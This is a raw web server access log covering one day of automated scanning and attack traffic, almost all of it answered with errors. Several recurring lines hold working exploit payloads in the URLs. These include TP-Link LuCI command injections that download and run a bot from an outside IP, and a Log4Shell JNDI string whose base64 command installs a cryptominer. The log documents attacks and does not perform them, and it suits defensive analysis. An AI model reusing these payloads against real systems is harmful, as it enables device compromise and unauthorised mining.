182.253.74.34 - - [07/Jul/2024:00:24:13 +0200] "GET / HTTP/1.1" 200 1895 20.118.71.181 - - [07/Jul/2024:00:35:20 +0200] "GET /actuator/health HTTP/1.1" 404 737 45.148.10.174 - - [07/Jul/2024:00:39:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:00:39:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [07/Jul/2024:01:05:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.206 - - [07/Jul/2024:01:09:22 +0200] "GET / HTTP/1.0" 200 1895 138.199.60.17 - - [07/Jul/2024:01:10:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [07/Jul/2024:01:18:40 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [07/Jul/2024:01:18:43 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.109 - - [07/Jul/2024:01:18:44 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [07/Jul/2024:01:39:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:02:54:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:03:04:44 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:44 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:44 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:03:04:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 45.128.232.152 - - [07/Jul/2024:03:08:59 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [07/Jul/2024:03:08:59 +0200] "-" 400 1930 45.128.232.152 - - [07/Jul/2024:03:08:59 +0200] "-" 400 1930 45.128.232.152 - - [07/Jul/2024:03:08:59 +0200] "-" 400 1930 152.32.207.124 - - [07/Jul/2024:03:26:29 +0200] "GET / HTTP/1.1" 200 1895 152.32.207.124 - - [07/Jul/2024:03:26:29 +0200] "-" 400 1930 205.210.31.45 - - [07/Jul/2024:03:36:28 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [07/Jul/2024:03:37:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [07/Jul/2024:03:37:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.10.163 - - [07/Jul/2024:04:05:44 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.148.10.174 - - [07/Jul/2024:04:05:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:04:05:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 167.99.119.168 - - [07/Jul/2024:04:33:01 +0200] "-" 400 1930 194.26.25.137 - - [07/Jul/2024:05:20:31 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [07/Jul/2024:05:33:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [07/Jul/2024:06:12:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:06:12:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [07/Jul/2024:06:48:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [07/Jul/2024:06:55:41 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 94.156.10.163 - - [07/Jul/2024:07:26:10 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 141.98.83.197 - - [07/Jul/2024:07:39:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [07/Jul/2024:07:39:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 65.49.20.105 - - [07/Jul/2024:08:02:36 +0200] "GET / HTTP/1.1" 200 1895 65.49.20.101 - - [07/Jul/2024:08:03:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729 65.49.20.69 - - [07/Jul/2024:08:03:53 +0200] "GET /?format=json HTTP/1.1" 200 1895 65.49.20.105 - - [07/Jul/2024:08:04:17 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 87.121.69.27 - - [07/Jul/2024:08:47:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:08:54:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:09:04:37 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 167.94.146.63 - - [07/Jul/2024:09:15:20 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.63 - - [07/Jul/2024:09:15:23 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.63 - - [07/Jul/2024:09:15:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 199.204.96.230 - - [07/Jul/2024:09:34:12 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [07/Jul/2024:09:45:53 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 178.62.9.225 - - [07/Jul/2024:09:51:54 +0200] "-" 400 1930 178.62.9.225 - - [07/Jul/2024:09:51:54 +0200] "-" 400 1930 178.62.9.225 - - [07/Jul/2024:09:51:54 +0200] "GET / HTTP/1.1" 200 1895 178.62.9.225 - - [07/Jul/2024:09:51:54 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 172.245.131.82 - - [07/Jul/2024:10:11:07 +0200] "GET / HTTP/1.1" 200 1895 23.95.209.192 - - [07/Jul/2024:10:22:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.79 - - [07/Jul/2024:10:42:29 +0200] "-" 400 1930 198.235.24.79 - - [07/Jul/2024:10:42:30 +0200] "-" 400 1930 94.156.64.121 - - [07/Jul/2024:11:20:23 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 65.49.1.21 - - [07/Jul/2024:12:19:53 +0200] "-" 400 1930 87.121.69.27 - - [07/Jul/2024:12:22:55 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [07/Jul/2024:12:55:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:12:55:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.67.70 - - [07/Jul/2024:13:02:50 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 38.222.38.32 - - [07/Jul/2024:13:30:54 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 90.151.171.106 - - [07/Jul/2024:13:37:25 +0200] "CONNECT eth0.me:443 HTTP/1.1" 400 804 90.151.171.106 - - [07/Jul/2024:13:37:30 +0200] "-" 400 1930 90.151.171.106 - - [07/Jul/2024:13:37:35 +0200] "GET /?Z79065299362Q1 HTTP/1.1" 200 1895 90.151.171.106 - - [07/Jul/2024:13:37:40 +0200] "-" 400 1930 78.108.177.54 - - [07/Jul/2024:14:14:39 +0200] "GET / HTTP/1.0" 200 1895 206.168.32.110 - - [07/Jul/2024:14:17:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [07/Jul/2024:14:17:31 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [07/Jul/2024:14:17:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 60.191.125.35 - - [07/Jul/2024:14:48:12 +0200] "HEAD / HTTP/1.1" 200 - 113.203.105.239 - - [07/Jul/2024:14:55:57 +0200] "POST /login HTTP/1.1" 404 723 94.156.8.2 - - [07/Jul/2024:15:20:26 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:15:50:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:54 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:15:50:55 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 87.121.69.27 - - [07/Jul/2024:16:20:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [07/Jul/2024:16:24:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:16:24:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 5.157.38.50 - - [07/Jul/2024:16:40:15 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 87.121.69.27 - - [07/Jul/2024:16:55:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.214.55.144 - - [07/Jul/2024:17:08:26 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuNHRoZXBvb2wudG9wL3NldHVwXzR0aGVwb29sX21pbmVyLnNoIHwgTENfQUxMPWVuX1VTLlVURi04IGJhc2ggLXMgNDk5YTZMTXZhbVdjdXFuVzd3bU1oNWlmTDFWU3o5YzNZUXAyUGNiQURGUDRhcjZhZDVldlBWUmV3QmZGcUhIUE5YVzRvclZlQVUxcmFVek1lVmZCUVozdFRwOEtaTEo=%7D%27) HTTP/1.1" 404 1189 221.227.84.72 - - [07/Jul/2024:17:28:10 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 164.92.231.207 - - [07/Jul/2024:17:51:02 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 172.169.5.17 - - [07/Jul/2024:17:54:33 +0200] "GET / HTTP/1.1" 200 1895 94.156.10.163 - - [07/Jul/2024:18:43:55 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 176.101.15.5 - - [07/Jul/2024:18:44:07 +0200] "GET / HTTP/1.1" 200 1895 45.89.245.57 - - [07/Jul/2024:18:52:18 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [07/Jul/2024:18:52:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [07/Jul/2024:18:52:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:19:42:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:19:42:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 104.168.70.165 - - [07/Jul/2024:20:23:43 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [07/Jul/2024:20:44:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.103 - - [07/Jul/2024:21:08:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jul/2024:21:08:31 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jul/2024:21:08:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:23 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jul/2024:21:40:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 87.121.69.27 - - [07/Jul/2024:21:41:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:57 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jul/2024:21:50:58 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 45.128.232.152 - - [07/Jul/2024:22:09:09 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [07/Jul/2024:22:09:09 +0200] "-" 400 1930 45.128.232.152 - - [07/Jul/2024:22:09:09 +0200] "-" 400 1930 45.128.232.152 - - [07/Jul/2024:22:09:09 +0200] "-" 400 1930 197.58.161.36 - - [07/Jul/2024:22:19:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 45.148.10.174 - - [07/Jul/2024:22:26:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [07/Jul/2024:22:26:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.126.213 - - [07/Jul/2024:23:52:43 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [07/Jul/2024:23:57:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804